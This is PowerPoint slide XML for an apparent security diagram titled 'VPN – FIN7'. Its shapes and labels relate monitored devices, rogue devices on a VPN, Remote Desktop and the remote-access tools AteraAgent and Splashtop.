                    <a:pt x="738734" y="1026653"/>
                    <a:pt x="758821" y="1006566"/>
                    <a:pt x="758821" y="982032"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="957499"/>
                    <a:pt x="738734" y="937411"/>
                    <a:pt x="714200" y="937411"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="624905" y="937411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624905" y="848116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714200" y="848116"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="738734" y="848116"/>
                    <a:pt x="758821" y="828029"/>
                    <a:pt x="758821" y="803495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="778962"/>
                    <a:pt x="738734" y="758875"/>
                    <a:pt x="714200" y="758875"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="624905" y="758875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624905" y="619147"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="702116" y="599542"/>
                    <a:pt x="758821" y="529439"/>
                    <a:pt x="758821" y="446422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="347764"/>
                    <a:pt x="678943" y="267885"/>
                    <a:pt x="580284" y="267885"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="580284" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="671776" y="32590"/>
                    <a:pt x="776241" y="63873"/>
                    <a:pt x="892737" y="89295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="988728" y="110272"/>
                    <a:pt x="1078441" y="124552"/>
                    <a:pt x="1160569" y="133916"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1160569" y="477112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148262" y="479597"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1087004" y="505507"/>
                    <a:pt x="1044021" y="566163"/>
                    <a:pt x="1044021" y="636859"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1054473" y="688631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024168" y="694750"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="962910" y="720660"/>
                    <a:pt x="919927" y="781316"/>
                    <a:pt x="919927" y="852012"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="919927" y="899143"/>
                    <a:pt x="939031" y="941811"/>
                    <a:pt x="969917" y="972698"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="978998" y="978821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977587" y="979106"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="916329" y="1005016"/>
                    <a:pt x="873346" y="1065672"/>
                    <a:pt x="873346" y="1136368"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="880413" y="1171373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811434" y="1223714"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="780645" y="1243791"/>
                    <a:pt x="748183" y="1261812"/>
                    <a:pt x="714200" y="1277544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="580284" y="1339172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446368" y="1277544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174559" y="1151677"/>
                    <a:pt x="0" y="879345"/>
                    <a:pt x="0" y="579401"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="133916"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82131" y="124553"/>
                    <a:pt x="171841" y="110272"/>
                    <a:pt x="267832" y="89295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384325" y="63819"/>
                    <a:pt x="488793" y="32590"/>
                    <a:pt x="580284" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="13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SK"/>
            </a:p>
          </p:txBody>
        </p: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51B8AFE-39C1-0A34-BFE8-427535744406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="64" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9143999" y="5052302"/>
            <a:ext cx="22895" cy="1422835"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="33000">
                  <a:schemeClr val="accent4"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="1"/>
              <a:tileRect/>
            </a:gra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462FAC2-C457-E318-4A30-CE9E9B2E2E42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6298307" y="6475137"/>
            <a:ext cx="5737174" cy="2853744"/>
            <a:chOff x="7177998" y="405422"/>
            <a:chExt cx="8717404" cy="2853744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle: Rounded Corners 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C862041-9810-4076-8395-0C2A1E07A6FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7177998" y="405422"/>
              <a:ext cx="8717404" cy="2853744"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4822"/>
              </a:avLst>
            </a:prstGeom>
            <a:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect l="-174431" t="-31679" r="-146991" b="-247925"/>
              </a:stretch>
            </a:blipFill>
            <a:ln>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent4"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="189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14D46F4-5224-7A26-1F5F-E5648E0DA3E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9070953" y="774301"/>
              <a:ext cx="49171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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Fedra Sans Alt Pro Book LF"/>
                </a:rPr>
                <a:t>Rogue Devices on VPN</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Graphic 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF2CB6D0-E8D6-103E-5C03-DCA395E368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562574" y="7509132"/>
            <a:ext cx="1586749" cy="1267673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20DCD33A-7C72-067B-BDCD-1BC14BFF38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253750" y="7509132"/>
            <a:ext cx="1586749" cy="1267673"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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73B0FCB0-A21A-D4C8-5C53-47F64D97A952}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7300235" y="7854532"/>
            <a:ext cx="1068114" cy="706529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13671"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="33000">
                <a:schemeClr val="accent4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3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 sz="110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2934CFFB-BE38-EC9E-3FED-AE3E6FBE8A65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9606702" y="7854532"/>
            <a:ext cx="1068114" cy="706529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13671"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="33000">
                <a:schemeClr val="accent4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3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 sz="110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9727252-352F-7A15-BD2F-F27E8F2974E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4785297" y="2198558"/>
            <a:ext cx="8717404" cy="2853744"/>
            <a:chOff x="7177998" y="405422"/>
            <a:chExt cx="8717404" cy="2853744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="Rectangle: Rounded Corners 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB393384-DE75-D588-1653-DB4CFA5AAD20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7177998" y="405422"/>
              <a:ext cx="8717404" cy="2853744"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4822"/>
              </a:avLst>
            </a:prstGeom>
            <a:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect l="-174431" t="-31679" r="-146991" b="-247925"/>
              </a:stretch>
            </a:blipFill>
            <a:ln>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent4"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="189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IntelOne Display Regular"/>
                <a:cs typeface="Arial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09879260-753F-9465-D83E-D4E921521602}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9070953" y="774301"/>
              <a:ext cx="49171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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Fedra Sans Alt Pro Book LF"/>
                </a:rPr>
                <a:t>Monitored Devices</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Graphic 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80E7B6D3-947E-ED75-FFE2-2C35A399A7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809185" y="3190350"/>
            <a:ext cx="1586749" cy="1267673"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="85" name="Graphic 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDF1CABA-3021-C843-1BC3-49746CAC31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350625" y="3190350"/>
            <a:ext cx="1586749" cy="1267673"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86" name="Graphic 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB9E929-C19F-7E0D-C36C-F9D8C3D91D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901282" y="3190350"/>
            <a:ext cx="1586749" cy="1267673"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Rounded Rectangle 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DF6C41F-17C2-453D-2DE0-5D56A1604061}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5947767" y="3535751"/>
            <a:ext cx="1068114" cy="706529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13671"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="3300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5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K" sz="1100">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AteraAgent Splashtop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Rounded Rectangle 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D59392C0-FC2D-D650-BFA0-FD84ACB26530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394753" y="3535751"/>
            <a:ext cx="1068114" cy="706529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13671"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="3300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5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K" sz="1100">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AteraAgent Splashtop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Rounded Rectangle 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80EDA505-910A-CB9D-E336-0CE8C539DEF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858910" y="3535751"/>
            <a:ext cx="1068114" cy="706529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13671"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="3300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5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K" sz="1100">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AteraAgent Splashtop</a:t>
            </a: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FBE78FCF-F71B-A0CE-6408-7A33315C3082}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9479932" y="5052302"/>
            <a:ext cx="1377254" cy="1422835"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="33000">
                  <a:schemeClr val="accent4"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="1"/>
              <a:tileRect/>
            </a:gra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20CBB998-0F76-E23E-7A87-744895FCBE59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7549147" y="5052302"/>
            <a:ext cx="1181142" cy="1422835"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="33000">
                  <a:schemeClr val="accent4"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="1"/>
              <a:tileRect/>
            </a:gra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27EB43B8-C354-B821-C080-79A742525CAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7534405" y="5447785"/>
            <a:ext cx="3242082" cy="592792"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13165"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent4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2700000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1371600">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Desktop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="106" name="!!Graphic 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B971AAEF-B7A5-48ED-BFEB-E43E6B70449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580579" y="7983414"/>
            <a:ext cx="506386" cy="477031"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109" name="!!Graphic 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{370C356A-B34D-500F-9CFB-A08D8F3C3C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913471" y="7983414"/>
            <a:ext cx="506386" cy="47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4964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7" grpId="0" animBg="1"/>
      <p:bldP spid="91" grpId="0" animBg="1"/>
      <p:bldP spid="92" grpId="0" animBg="1"/>
      <p:bldP spid="93" grpId="0" animBg="1"/>
      <p:bldP spid="8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2D3DB0-BBFA-A846-84C9-745CAE24C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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEFFCB35-915F-E027-D520-D89DA2490A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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88FC5FAD-A411-0CD0-EC94-85126AAE00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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4613D74-C2FA-CE8C-3ECA-22AC54CE0C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220222" y="-16963399"/>
            <a:ext cx="42906647" cy="26403406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B04BD5-DD4E-1986-BEB7-664A39EB41B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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75ED6F20-42C1-88EC-C16F-2923780159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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6AC914E-EF29-DE1B-7DF8-A56755B5C7D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="892285"/>
            <a:ext cx="3183467" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VPN – FIN7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754" b="1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4E655C8-660F-703D-56ED-3B07AE766E31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4038391" y="669455"/>
            <a:ext cx="726372" cy="838155"/>
            <a:chOff x="14027225" y="3493572"/>
            <a:chExt cx="1160569" cy="1339172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2B359DE-EAE0-B738-EE2B-2FE91F693BBB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14518214" y="3850697"/>
              <a:ext cx="178590" cy="178538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 178590 w 178590"/>
                <a:gd name="connsiteY0" fmla="*/ 89243 h 178538"/>
                <a:gd name="connsiteX1" fmla="*/ 89295 w 178590"/>
                <a:gd name="connsiteY1" fmla="*/ 178538 h 178538"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 178590"/>
                <a:gd name="connsiteY2" fmla="*/ 89243 h 178538"/>
                <a:gd name="connsiteX3" fmla="*/ 89295 w 178590"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 178538"/>
                <a:gd name="connsiteX4" fmla="*/ 178590 w 178590"/>
                <a:gd name="connsiteY4" fmla="*/ 89243 h 178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590" h="178538">
                  <a:moveTo>
                    <a:pt x="178590" y="89243"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="178590" y="138572"/>
                    <a:pt x="138624" y="178538"/>
                    <a:pt x="89295" y="178538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39966" y="178538"/>
                    <a:pt x="0" y="138572"/>
                    <a:pt x="0" y="89243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="39966"/>
                    <a:pt x="39966" y="0"/>
                    <a:pt x="89295" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138624" y="0"/>
                    <a:pt x="178590" y="39966"/>
                    <a:pt x="178590" y="89243"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="13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SK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54FF904-A9A7-FAB0-B7A3-5175595AF809}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14027225" y="3493572"/>
              <a:ext cx="1160569" cy="1339172"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY0" fmla="*/ 267885 h 1339172"/>
                <a:gd name="connsiteX1" fmla="*/ 401748 w 1160569"/>
                <a:gd name="connsiteY1" fmla="*/ 446422 h 1339172"/>
                <a:gd name="connsiteX2" fmla="*/ 535664 w 1160569"/>
                <a:gd name="connsiteY2" fmla="*/ 619147 h 1339172"/>
                <a:gd name="connsiteX3" fmla="*/ 535664 w 1160569"/>
                <a:gd name="connsiteY3" fmla="*/ 982032 h 1339172"/>
